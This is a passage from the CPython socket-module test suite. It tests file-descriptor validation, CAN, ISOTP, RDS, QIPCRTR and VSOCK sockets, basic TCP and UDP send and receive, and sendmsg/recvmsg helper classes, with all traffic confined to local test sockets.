socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS fails')
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS fails')
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
address = ('', )
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
